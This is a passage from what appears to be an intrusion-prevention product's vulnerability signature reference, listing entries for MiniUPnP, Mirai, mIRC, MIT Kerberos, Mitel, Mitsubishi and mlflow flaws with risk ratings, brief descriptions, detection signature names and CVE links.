http://www.securityfocus.com/bid/57607
Back to top

MiniUPnP-Stack-Based-Buffer-Overflow

About this vulnerability: A MiniUPnP Stack Based Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MiniUPnP
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in MiniUPnP 1.0 which allows remote attackers to execute arbitrary code via a long quoted method.
Situation: Generic_CS-MiniUPnP-Stack-Based-Buffer-Overflow
References:
CVE-2013-0230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
BID-57608
http://www.securityfocus.com/bid/57608
Back to top

Mirai-Botnet

About this vulnerability: Mirai botnet
Risk: High
First detected in: sgpkg-ips-1010-5242
Last changed: sgpkg-ips-1355-5242
Platform: Generic
Software: <os>
Type: Code Injection
Description: Mirai is a malicious botnet that infects Linux-based systems. Mirai spreads as a worm by attempting to break into systems accessible via Telnet and SSH that are susceptible to default password logins. The main focus of Mirai's monetization is massive distributed denial-of-service attacks in which compromised devices jointly attack innocuous victims. Mirai usually does not persist on the infected device, i.e., a hard power cycle will remove Mirai -- however, precaution should be taken to change passwords or deny Telnet/SSH access.
Situation: Telnet_CS-Mirai-Botnet-C-And-C-Traffic
Generic_CS-Mirai-Botnet-C-And-C-Traffic
Generic_CS-Mirai-Botnet-C-And-C-Traffic-4
Generic_CS-Mirai-Botnet-C-And-C-Traffic-3
Generic_CS-Mirai-Botnet-C-And-C-Traffic-2
Back to top

mIRC-IRC-URI-Protocol-Handler-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in mIRC
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: mIRC
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in mIRC. The vulnerability is due to insufficient input validation when handling irc:// protocol URIs. An exploitation may lead to arbitrary code exectution in the context of the current user.
Situation: HTTP_SS-mIRC-IRC-URI-Protocol-Handler-Buffer-Overflow
File-Text_mIRC-IRC-URI-Protocol-Handler-Buffer-Overflow
References:
CVE-2003-1336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1336
BID-8819
http://www.securityfocus.com/bid/8819
OSVDB-2665
http://www.osvdb.org/2665
Back to top

mIRC-PRIVMSG-Message-Processing-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in mIRC
Risk: Moderate
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: mIRC
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the handling of the PRIVMSG command with an overly long prefix in mIRC. A successful exploit leads to a termination of the affected application or arbitrary code execution with the privileges of the currently logged in user.
Situation: Generic_mIRC-PRIVMSG-Message-Processing-Buffer-Overflow
References:
CVE-2008-4449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4449
BID-31552
http://www.securityfocus.com/bid/31552
OSVDB-48752
http://www.osvdb.org/48752
Back to top

mIRC-URI-Handler-Remote-Code-Execution

About this vulnerability: A vulnerability in mIRC
Risk: Moderate
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: mIRC
Type: Input Validation
Description: There has been reported a remote code execution vulnerability in mIRC. This vulnerability can be exploited by opening a malicious web page.
Situation: HTTP_SHS-mIRC-URI-Handler-Remote-Code-Execution
File-Text_mIRC-URI-Handler-Remote-Code-Execution
References:
CVE-2019-6453
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6453
Back to top

MirrorBlast-Malware-Infection-Traffic

About this vulnerability: MirrorBlast Malware infection traffic
Risk: High
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1392-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: MirrorBlast malware infection traffic was detected.
Situation: HTTP_CS-MirrorBlast-Malware-Infection-Traffic
Back to top

Mirth-Connect-Remote-Code-Execution-CVE-2023-43208

About this vulnerability: A vulnerability in Mirth Connect
Risk: High
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Platform: Generic
Software: Mirth Connect
Type: Malfunction
Description: A remote code execution vulnerability has been reported in NextGen Healthcare Mirth Connect versions prior to 4.4.1. This vulnerability stems from the incomplete patching of CVE-2023-37679. Both vulnerabilities are due to insecure usage of XStream to unmarshall user-supplied XML.
Situation: File-Text_Mirth-Connect-Remote-Code-Execution-CVE-2023-43208
File-TextId_Mirth-Connect-Remote-Code-Execution-CVE-2023-43208
References:
CVE-2023-43208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43208
Back to top

MISC-BOOTP-Hardware-Address-Length-Overflow

About this vulnerability: Buffer overflow in BOOTP daemon.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: bootpd
Type: Buffer Overflow
Description: A BOOTP daemon shipped within many Unix systems contains a buffer overflow, which can be exploited to cause the bootp server to crash. It has also been confirmed that this vulnerability can be used to execute arbitrary commands on OpenBSD and BSDI platforms.
Situation: BOOTP_Daemon-Hardware-Address-Length-Overflow
References:
CVE-1999-0798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0798
Back to top

Miscrosoft-Edge-Information-Disclosure-Vulnerability-CVE-2017-0017

About this vulnerability: A vulnerability in Microsoft Edfe
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Edge
Type: Malfunction
Description: There exists a vulnerability in Microsoft Edge.
Situation: File-Text_Microsoft-Edge-Information-Disclosure-Vulnerability-CVE-2017-0017
References:
CVE-2017-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0017
MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006
Back to top

Miscrosoft-Edge-RCE-CVE-2017-0200

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Edge
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Edge. A successful exploitation could allow the attacker to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Edge-RCE-CVE-2017-0200
References:
CVE-2017-0200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0200
ms17-apr
http://technet.microsoft.com/security/bulletin/ms17-apr
Back to top

Miscrosoft-Office-RCE-CVE-2017-0199

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Office. The vulnerability can be triggered with a specially crafted file. A succesfull exploitation can allow the attacker to take control of the affected system.
Situation: File-OLE_Microsoft-Office-RCE-CVE-2017-0199
File-RTF_Microsoft-Office-RCE-CVE-2017-0199
File-TextId_Microsoft-Office-RCE-CVE-2017-0199
References:
CVE-2017-0199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199
ms17-apr
http://technet.microsoft.com/security/bulletin/ms17-apr
Back to top

Miscrosoft-Outlook-RCE-CVE-2017-0106

About this vulnerability: A vulnerability in Microsoft Outlook
Risk: Moderate
First detected in: sgpkg-ips-876-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Outlook
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Outlook. The vulnerability can be triggered with a specially crafted email. A succesfull exploitation can allow the attacker to take control of the affected system.
Situation: File-OLE_Microsoft-Outlook-RCE-CVE-2017-0106
References:
CVE-2017-0106
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0106
ms17-apr
http://technet.microsoft.com/security/bulletin/ms17-apr
Back to top

MIT-Kerberos-5-Build_Principal_va-Denial-Of-Service

About this vulnerability: A vulnerability in MIT Kerberos 5
Risk: Moderate
First detected in: sgpkg-ips-708-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos 5
Type: Malfunction
Description: A parser vulnerability can be exploited to cause a denial of service by sending a crafted packet containing a null byte in the realm name.
Situation: Generic_UDP-MIT-Kerberos-5-Build_Principal_va-Denial-Of-Service
Generic_CS-MIT-Kerberos-5-Build_Principal_va-Denial-Of-Service
References:
CVE-2015-2697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2697
Back to top

MIT-Kerberos-5-Invalid-RFC-1964-Token-Denial-of-Service

About this vulnerability: An MIT Kerberos 5 Invalid RFC 1964 Token Denial of Service vulnerability
Risk: High
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos 5
Type: Null Pointer Dereference
Description: A vulnerability in MIT Kerberos 5 which allows remote attackers to cause a denial of service condition by injecting packets into a legitimate GSSAPI session, due to a NULL pointer dereference when Kerberos processes RFC 1964 tokens with an RFC 4121 context.
Situation: Generic_UDP-MIT-Kerberos-5-Invalid-RFC-1964-Token-Denial-of-Service
Generic_CS-MIT-Kerberos-5-Invalid-RFC-1964-Token-Denial-of-Service
References:
CVE-2014-4342
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4342
Back to top

MIT-Kerberos-5-Kadmind-Kadm5_Policy-Denial-Of-Service

About this vulnerability: A vulnerability in MIT Kerberos 5
Risk: High
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos 5
Type: Malfunction
Description: There exists a denial-of-service vulnerability in the MIT Kerberos 5 kadmind service. A rmeote attacker can use this to terminate the kadmin service.
Situation: Generic_CS-MIT-Kerberos-5-Kadmind-Kadm5_Policy-Denial-Of-Service
References:
CVE-2015-8630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8630
Back to top

MIT-Kerberos-5-Kadmind-Null-Pointer-Dereference

About this vulnerability: A vulnerability in MIT Kerberos 5
Risk: High
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos 5
Type: Malfunction
Description: There exists a denial-of-service vulnerability in the MIT Kerberos 5 kadmind service.
Situation: Generic_CS-MIT-Kerberos-5-Kadmind-Null-Pointer-Dereference
References:
CVE-2016-3119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3119
Back to top

MIT-Kerberos-5-KDC-Null-Pointer-Dereference

About this vulnerability: An MIT Kerberos 5 KDC Null Pointer Dereference vulnerability
Risk: High
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos 5
Type: Null Pointer Dereference
Description: A vulnerability in MIT Kerberos 5 KDC which allows remote attackers to create a denial of service condition by sending a specially crafted packet to the target server, due to a NULL pointer dereference in the pkinit_check_kdc_pkid function while processing malformed requests.
Situation: Generic_CS-MIT-Kerberos-5-KDC-Null-Pointer-Dereference
References:
CVE-2013-1415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1415
Back to top

MIT-Kerberos-5-KDC-prep_reprocess_req-Null-Pointer-Dereference

About this vulnerability: An MIT Kerberos 5 KDC prep_reprocess_req NULL Pointer Dereference vulnerability
Risk: High
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos 5
Type: Malfunction
Description: A vulnerability in MIT Kerberos 5 which allows remote attackers to cause a denial of service condition by sendig specially crafted packets to the target server, due to the server using a NULL pointer in the prep_reporocess_req function while processing and unusual but valid TGS-REQ.
Situation: Generic_UDP-MIT-Kerberos-5-KDC-prep_reprocess_req-Null-Pointer-Dereference
References:
CVE-2013-1416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1416
Back to top

MIT-Kerberos-5-KDC-TCP-Handling-Denial-of-Service

About this vulnerability: An MIT Kerberos 5 KDC TCP Handling Denial of Service vulnerability
Risk: High
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos 5
Type: Malfunction
Description: A vulnerability in MIT Kerberos 5 KDC which allows remote attackers to create a denial of service condition, or possibly excute arbitrary code, due to improper handling of an error case that results in heap corruption.
Situation: Generic_CS-MIT-Kerberos-5-KDC-TCP-Handling-Denial-of-Service
References:
CVE-2005-1174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1174
Back to top

MIT-Kerberos-5-kpasswd-UDP-Ping-Pong-Denial-Of-Service

About this vulnerability: An MIT Kerberos 5 kpasswd UDP Ping-Pong Denial Of Service vulnerability
Risk: High
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos 5
Type: Malfunction
Description: A vulnerability in MIT Kerberos 5 which allows remote attackers to cause a denial of service condition by spoofing the IP address and UDP port value on a malformed kpasswd request sent to the vulnerable server to that of the server itself, due to the way the kadmin servers respond to malformed kpasswd UDP request packet.
Situation: Generic_UDP-MIT-Kerberos-5-kpasswd-UDP-Ping-Pong-Denial-Of-Service
References:
CVE-2002-2443
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2443
Back to top

MIT-Kerberos-5-Recvauth-Invalid-Memory-Access

About this vulnerability: A vulnerability in MIT Kerberos
Risk: High
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos
Type: Malfunction
Description: A denial of service vulnerability exists in MIT Kerberos 5. The vulnerability occurs when recvauth_common() calls krb5_read_message() to receive and process a crafted message causing it to return an invalid string that later causes a NULL pointer dereference or an attempt to read beyond the end of a buffer. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted message to an application, such as klogind, that use the krb5_recvauth() API. Successful exploitation will cause the vulnerable application process to terminate.
Situation: Generic_CS-MIT-Kerberos-5-Recvauth-Invalid-Memory-Access
References:
CVE-2014-5355
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5355
OSVDB-118567
http://www.osvdb.org/118567
Back to top

MIT-Kerberos-5-SPNEGO-Acceptor-acc_ctx_cont-Denial-of-Service

About this vulnerability: An MIT Kerberos 5 SPNEGO Acceptor acc_ctx_cont Denial of Service vulnerability
Risk: High
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos 5
Type: Null Pointer Dereference
Description: A vulnerability in MIT Kerberos 5 which allows remote attackers to cause a denial of service condition by sending an empty token as the second or later context token during SPNEGO negotiation.
Situation: Generic_CS-MIT-Kerberos-5-SPNEGO-Acceptor-acc_ctx_cont-Denial-of-Service
References:
CVE-2014-4344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4344
Back to top

MIT-Kerberos-Asn1DecodeGeneraltime-Uninitialized-Pointer-Reference

About this vulnerability: A vulnerability in MIT Kerberos
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos
Type: Malfunction
Description: A memory corruption vulnerability exists in MIT Kerberos server. The vulnerability is due to the release of an uninitialized pointer in the ASN.1 decoder while decoding maliciously crafted data. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted RPC request to the kadmind daemon. In an attack aiming for denial of service, the Kerberos kadmind service will terminate abnormally as a result of an attack. The Kerberos administration functionality remains unavailable until the service is restarted. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the service process, which may be system/root level.
Situation: Generic_UDP-MIT-KerberosAsn1_Decode_Generaltime-Uninitialized-Pointer-Reference
References:
CVE-2009-0846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0846
BID-34409
http://www.securityfocus.com/bid/34409
Back to top

MIT-Kerberos-Kadmind-Rename-Principal-Buffer-Overflow

About this vulnerability: A vulnerability in MIT Kerberos
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in the Kerberos Administration Server (kadmind). The vulnerability is due to insufficient boundary check while handling requests to rename principals. A remote authenticated attacker can exploit this vulnerability by sending a specially crafted RPC request to the kadmind daemon. Successful exploitation may lead to execution of arbitrary code with root privileges on the target host. In an attack aiming for denial of service, the Kerberos kadmind service will terminate abnormally as a result of an attack. The Kerberos administration functionality remains unavailable until the service is restarted. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the service process, which may be system/root level.
Situation: SunRPC_MIT-Kerberos-Kadmind-Rename-Principal-Buffer-Overflow
References:
CVE-2007-2798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2798
BID-24653
http://www.securityfocus.com/bid/24653
OSVDB-36595
http://www.osvdb.org/36595
Back to top

MIT-Kerberos-Kadmind-RPC-Library-RPCSEC-GSS-Authentication-BOF

About this vulnerability: Buffer overflow vulnerability in MIT Kerberos Administration Server
Risk: High
First detected in: sgpkg-ips-120-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos
Type: Buffer Overflow
Description: There is a remote exploitable buffer overflow vulnerability in the MIT Kerberos Administration Server. The vulnerability can be exploited by sending a crafted Kerberos message that contains an overly large value in the Length field of the credentials section to compromise the vulnerable system.
Situation: SunRPC_TCP-MIT-Kerberos-Kadmind-RPC-Library-RPCSEC-GSS-Authentication-BOF
References:
CVE-2007-3999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3999
BID-25534
http://www.securityfocus.com/bid/25534
Back to top

MIT-Kerberos-Kadmind-RPC-Library-Uninitialized-Pointer

About this vulnerability: A vulnerability in Kerberos
Risk: High
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: MIT Kerberos
Type: Buffer Overflow
Description: There exists a memory corruption vulnerability in the Kerberos Administration Server (kadmind). The vulnerability is due to insufficient validating of user-supplied data while processing RPC requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted RPC request to the kadmind daemon. Successful exploitation may lead to executing arbitrary code with root privileges on the target host.
Situation: SunRPC_TCP-MIT-Kerberos-Kadmind-RPC-Library-Uninitialized-Pointer
References:
CVE-2007-2442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442
BID-24655
http://www.securityfocus.com/bid/24655
OSVDB-36596
http://www.osvdb.org/36596
Back to top

MIT-Kerberos-KDC-Authentication-Denial-Of-Service

About this vulnerability: A vulnerability in MIT Kerberos
Risk: Moderate
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos
Type: Input Validation
Description: There is a denial of service vulnerability in MIT's Kerberos KDC. The vulnerability is due to an assertion failure when handling invalid Authentication Service requests. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted AS-REQ packet to the target KDC, causing it to crash, resulting in a denial of service condition.
Situation: Generic_UDP-MIT-Kerberos-KDC-Authentication-Denial-Of-Service
References:
CVE-2010-0283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0283
BID-38260
http://www.securityfocus.com/bid/38260
Back to top

MIT-Kerberos-KDC-Cross-Realm-Referral-Denial-of-Service

About this vulnerability: An MIT Kerberos KDC Cross Realm Referral Denial of Service vulnerability
Risk: High
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos 5
Type: Null Pointer Dereference
Description: A vulnerability in MIT Kerberos 5 which allows remote attackers to cause a denial of service condition by sending a specially crafted packet to the affected KDC, due to a NULL pointer dereference in the KDC cross-realm referral processing implementation.
Situation: Generic_UDP-MIT-Kerberos-KDC-Cross-Realm-Referral-Denial-of-Service
References:
CVE-2009-3295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3295
Back to top

MIT-Kerberos-KDC-Null-Pointer-Denial-Of-Service

About this vulnerability: A vulnerability in MIT Kerberos
Risk: Moderate
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos
Type: Malfunction
Description: A denial of service vulnerability exists in MIT's Kerberos implementation. The vulnerability is due to a NULL pointer dereference when the Key Distribution Center (KDC) handles malformed requests. Remote un-authenticated attackers could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation of this vulnerability can crash the KDC service, causing a denial of service condition.
Situation: Generic_UDP-MIT-Kerberos-KDC-Null-Pointer-Denial-Of-Service
References:
CVE-2011-0283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0283
BID-46272
http://www.securityfocus.com/bid/46272
Back to top

MIT-Kerberos-KDC-Ticket-Validation-Double-Free-Memory-Corruption

About this vulnerability: A vulnerability in MIT Kerberos
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos
Type: Malfunction
Description: A memory corruption vulnerability exists in the MIT Kerberos KDC server. The vulnerability is due to a double-free in the ticket validation mechanism (do_tgs_req.c). Remote authenticated attackers can exploit this vulnerability by sending a specially crafted packet to the target server. Successful exploitation of this vulnerability would allow code injection and execution in the context of root account. If the code injection is not successful, the vulnerable server might terminate abnormally, causing a denial of service condition.
Situation: Generic_UDP-MIT-Kerberos-KDC-Ticket-Validation-Double-Free-Memory-Corruption
References:
CVE-2010-1320
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1320
BID-39599
http://www.securityfocus.com/bid/39599
Back to top

MIT-Kerberos-V5-Kadmind-Klog_vsyslog-Server-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in MIT Kerberos
Risk: High
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1296-5242
Platform: Debian GNU/Linux; Fedora Linux; Gentoo Linux; Mandrake Linux; SUSE Linux; OpenBSD; Red Hat Enterprise Linux; Red Hat Linux; Ubuntu Linux
Software: MIT Kerberos
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in MIT Kerberos. The vulnerability is due to a boundary error in the server's logging function in the Kerberos Administration Server (kadmind). A remote, authenticated attacker can exploit this vulnerability by supplying a specially crafted string to the kadmind daemon. Successful exploitation would cause a stack based buffer overflow that can lead to compromising the Kerberos key database, or executing arbitrary code with root privileges on the target host. In a simple attack aiming for denial of service, the Kerberos Administration service (kadmind) will terminate abnormally as a result of an attack. The Kerberos administration functionality remains unavailable until the service is restarted. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the service process, which may be system/root level.
Situation: Generic_UDP-MIT-Kerberos-V5-Kadmind-Klog_vsyslog-Server-Stack-Buffer-Overflow
References:
CVE-2007-0957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0957
BID-23285
http://www.securityfocus.com/bid/23285
Back to top

MIT-Kerberos-V5-KDC-Krb5_Unparse_Name-Heap-Overflow

About this vulnerability: A vulnerability in MIT Kerberos Project Kerberos
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT Kerberos
Type: Buffer Overflow
Description: There is a single byte heap overflow vulnerability in the MIT Kerberos V5 Key Distribution Center (KDC) implementation. The vulnerability is caused due to improper boundary checking in krb5_unparse_name function, and can result in a single byte overflow of a heap buffer. An unauthenticated remote attacker can leverage this vulnerability to cause a denial of service or to execute arbitrary code, potentially compromising an entire Kerberos realm. In a simple attack scenario, the Key Distribution Center (KDC) server will terminate as a result of an attack. Consequently, the functionality of servers and workstations in the affected Kerberos Realm is interrupted, creating a site-wide denial of service condition. The KDC functionality remains unavailable until the server is restarted. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the service process, which may be system/root level.
Situation: Generic_MIT-Kerberos-V5-KDC-Krb5_Unparse_Name-Heap-Overflow
References:
CVE-2005-1175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1175
BID-14236
http://www.securityfocus.com/bid/14236
Back to top

Mitel-MiCollab-SQL-Injection-CVE-2024-35286

About this vulnerability: An attempt to exploit a vulnerability in Mitel MiCollab detected
Risk: High
First detected in: sgpkg-ips-1809-5242
Last changed: sgpkg-ips-1809-5242
Platform: Generic
Software: Mitel MiCollab
Type: SQL Injection
Description: A vulnerability in NuPoint Messenger (NPM) of Mitel MiCollab through 9.8.0.33 allows an unauthenticated attacker to conduct a SQL injection attack due to insufficient sanitization of user input. A successful exploit could allow an attacker to access sensitive information and execute arbitrary database and management operations.
Situation: HTTP_CRL-Mitel-MiCollab-SQL-Injection-CVE-2024-35286
References:
CVE-2024-35286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-35286
Back to top

Mitel-MiVoice-Connect-Remote-Code-Execution-CVE-2022-29499

About this vulnerability: A vulnerability in Mitel MiVoice Connect
Risk: High
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Platform: Generic
Software: Mitel MiVoice Connect
Type: Input Validation
Description: An unauthenticated remote code execution vulnerability has been reported in Mitel MiVoice Connect.
Situation: HTTP_CRL-Mitel-MiVoice-Connect-Remote-Code-Execution-CVE-2022-29499
References:
CVE-2022-29499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29499
Back to top

Mitel-SIP-Phone-Argument-Injection-CVE-2024-41710

About this vulnerability: An attempt to exploit a vulnerability in Mitel SIP phone detected
Risk: High
First detected in: sgpkg-ips-1831-5242
Last changed: sgpkg-ips-1831-5242
Platform: Generic
Software: Mitel SIP Phone
Type: Input Validation
Description: A vulnerability in the Mitel 6800 Series, 6900 Series, and 6900w Series SIP Phones, including the 6970 Conference Unit, through R6.4.0.HF1 (R6.4.0.136) could allow an authenticated attacker with administrative privilege to conduct an argument injection attack, due to insufficient parameter sanitization during the boot process. A successful exploit could allow an attacker to execute arbitrary commands within the context of the system.
Situation: HTTP_CRL-Mitel-SIP-Phone-Argument-Injection-CVE-2024-41710
References:
CVE-2024-41710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41710
Back to top

Mitsubishi-Electric-E-Designer-Becomlislave-Status_Bit-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Mitsubishi Electric E-Designer
Risk: Moderate
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mitsubishi Electric E-Designer
Type: Buffer Overflow
Description: Improper validation of the Status_bit parameter in the configuration file of Mitsubishi's Electric E-Designer causes a stack buffer overflow vulnerability. A successful exploitation allows an attacker to execute arbitrary code with the privileges of the affected user.
Situation: File-Text_Mitsubishi-Electric-E-Designer-Becomlislave-Status_Bit-Stack-Buffer-Overflow
References:
CVE-2017-9638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9638
Back to top

Mitsubishi-Electric-E-Designer-Setupalarm-Font-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Mitsubishi Electric E-Designer
Risk: Moderate
First detected in: sgpkg-ips-972-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mitsubishi Electric E-Designer
Type: Buffer Overflow
Description: Bad validation of the font parameters in a .mpa file causes a stack buffer overflow in Mitsubishi Electric E-Designer. A successful attack allows arbitrary code execution with user privileges on the target system.
Situation: File-Text_Mitsubishi-Electric-E-Designer-Setupalarm-Font-Stack-Buffer-Overflow
References:
CVE-2017-9638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9638
Back to top

Mitsubishi-MC-WorkX-8.02-ActiveX-Control-Vulnerability

About this vulnerability: A vulnerability in Mitsubishi MC-WorkX 8.02
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mitsubishi MC-WorkX 8.02
Type: Malfunction
Description: There is a directory traversal vulnerability in Mitsubishi MC-WorkX 8.02. The vulnerability is due to insufficient validation of parameters used in the FileName() method in an ActiveX control.
Situation: File-Text_Mitsubishi-MC-WorkX-8.02-ActiveX-Control-Vulnerability
References:
CVE-2013-2817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2817
OSVDB-97379
http://www.osvdb.org/97379
Back to top

Mitsubishi-MX-ActiveX-Control-ActUWzd.dll-Buffer-Overflow

About this vulnerability: A vulnerability in Mitsubishi MX
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mitsubishi MX
Type: Malfunction
Description: There is a buffer overflow vulnerability in the ActUWzd.dll ActiveX control of Mitsubishi MX which may allow remote attackers to execute arbitrary code via a long string parameter.
Situation: File-Text_Mitsubishi-MX-ActiveX-Control-ActUWzd.dll-Buffer-Overflow
References:
CVE-2013-3075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3075
OSVDB-91661
http://www.osvdb.org/91661
Back to top

Mlflow-Experiments-Local-File-Inclusion-CVE-2023-6909

About this vulnerability: A vulnerability in mlflow
Risk: High
First detected in: sgpkg-ips-1781-5242
Last changed: sgpkg-ips-1781-5242
Platform: Generic
Software: mlflow
Type: Directory Traversal
Description: A local file inclusion vulnerability has been reported in mlflow versions prior to 2.9.2. Successfully exploiting this vulnerability allows an unauthenticated attacker to read arbitrary system files, leading into the disclosure of sensitive information such as passwords.
Situation: HTTP_CRL-Mlflow-Experiments-Local-File-Inclusion-Vulnerabilities
References:
